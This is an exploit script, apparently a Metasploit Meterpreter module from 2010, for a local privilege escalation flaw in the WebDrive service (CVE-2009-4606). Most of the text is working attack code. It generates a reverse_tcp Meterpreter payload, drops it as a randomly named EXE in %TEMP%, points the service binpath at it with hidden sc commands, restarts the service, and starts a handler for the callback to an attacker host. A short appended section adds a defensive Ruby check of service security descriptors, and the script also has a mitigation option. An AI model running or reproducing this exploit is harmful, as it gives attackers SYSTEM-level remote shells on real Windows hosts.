South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation
Source: http://www.rec-sec.com  Author: Trancer  Published: 2010-01-27

##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
#  This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
#  Due to an empty security descriptor, a local attacker can gain elevated privileges.
#  Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
#  Vulnerability mitigation featured.
#
#  Credit:
#   - Discovery   - Nine:Situations:Group::bellick
#   - Meterpreter script - Trancer
#
#  References:
#   - http://retrogod.altervista.org/9sg_south_river_priv.html
#   - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
#   - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
#   - http://osvdb.org/show/osvdb/59080
#
#  mtrancer[@]gmail.com
#  http://www.rec-sec.com
##

#
# Options
#
opts = Rex::Parser::Arguments.new(
 "-h"  => [ false,  "This help menu"],
 "-m"  => [ false,  "Mitigate"],
 "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
 "-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
)

#
# Default parameters
#

rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
 case opt
 when "-h"
  print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
  print_line(opts.usage)
  raise Rex::Script::Completed
 when "-m"
  client.sys.process.get_processes().each do |m|
   if ( m['name'] == pname )
    print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
    
    # Set correct service security descriptor to mitigate the vulnerability
    print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
    client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
   end
  end
  raise Rex::Script::Completed
 when "-r"
  rhost = val
 when "-p"
  rport = val.to_i
 end
end

client.sys.process.get_processes().each do |m|
 if ( m['name'] == pname )

  print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")

  # Build out the exe payload.
  pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
  pay.datastore['LHOST'] = rhost
  pay.datastore['LPORT'] = rport
  raw  = pay.generate

  exe = Msf::Util::EXE.to_win32pe(client.framework, raw)

  # Place our newly created exe in %TEMP%
  tempdir = client.fs.file.expand_path("%TEMP%")
  tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
  print_status("Sending EXE payload '#{tempexe}'.")
  fd = client.fs.file.new(tempexe, "wb")
  fd.write(exe)
  fd.close

  # Stop the vulnerable service
  print_status("Stopping service \"#{sname}\"...")
  client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})

  # Set exe payload as service binpath
  print_status("Setting \"#{sname}\" to #{tempexe}...")
  client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
  sleep(1)
  
  # Restart the service
  print_status("Restarting the \"#{sname}\" service...")
  client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})

  # Our handler to receive the callback.
  handler = client.framework.exploits.create("multi/handler")
  handler.datastore['PAYLOAD']   = "windows/meterpreter/reverse_tcp"
  handler.datastore['LHOST']     = rhost
  handler.datastore['LPORT']     = rport
  handler.datastore['ExitOnSession']  = false

  handler.exploit_simple(
   'Payload' => handler.datastore['PAYLOAD'],
   'RunAsJob' => true
  )

  # Set service binpath back to normal
  client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
   
 end
end
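Added defensive check, not part of Trancer's script: a small Ruby audit of a service security descriptor in SDDL form (the format `sc sdshow` prints and the `sc sdset` mitigation above consumes) that flags access-allowed ACEs granting reconfigure, stop or takeover rights to principals other than Administrators and SYSTEM. The fixed descriptor is the one the script applies; the weak descriptor is constructed for illustration.

```ruby
# Added example, not part of the original script: audit a service security
# descriptor in SDDL form (what `sc sdshow <name>` prints and `sc sdset`
# consumes) for ACEs that let non-administrators alter the service.

# SDDL service rights that allow changing or taking over the service:
# DC = change config (binpath= etc.), WP = stop, WD = write DACL,
# WO = write owner, GA/GW = generic all/write.
WRITE_RIGHTS = %w[DC WP WD WO GA GW].freeze
# Principals expected to hold such rights: Builtin Administrators, Local System.
TRUSTED_SIDS = %w[BA SY].freeze

# The descriptor the original script applies with `sc sdset` (from the page).
FIXED_SDDL = 'D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)' \
             '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)'
# Constructed weak descriptor: Authenticated Users get full service control.
WEAK_SDDL = 'D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)'

# Returns an array of findings; an empty array means the DACL looks sane.
def audit_service_sddl(sddl)
  dacl = sddl[/D:[A-Z]*((?:\([^)]*\))*)/, 1]
  # No D: section at all means a NULL DACL, which grants everyone full control.
  return ['no DACL present: everyone has full control'] if dacl.nil?

  findings = []
  dacl.scan(/\(([^)]*)\)/).flatten.each do |ace|
    type, _flags, rights, _obj, _iobj, sid = ace.split(';', 6)
    next unless type == 'A'            # only access-allowed ACEs grant anything
    next if TRUSTED_SIDS.include?(sid)
    if rights.to_s.start_with?('0x')   # raw access mask: not mapped to tokens here
      findings << "#{sid} has numeric rights mask #{rights}: review manually"
      next
    end
    granted = rights.to_s.scan(/[A-Z]{2}/) & WRITE_RIGHTS
    findings << "#{sid} granted #{granted.join(',')}" unless granted.empty?
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  { 'fixed' => FIXED_SDDL, 'weak' => WEAK_SDDL, 'null dacl' => 'O:SYG:SY' }.each do |label, sd|
    puts "#{label}: #{audit_service_sddl(sd).inspect}"
  end
end
```

Running `sc sdshow WebDriveService` on a host and feeding the output to `audit_service_sddl` shows whether the mitigation from the `-m` option has taken effect.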


 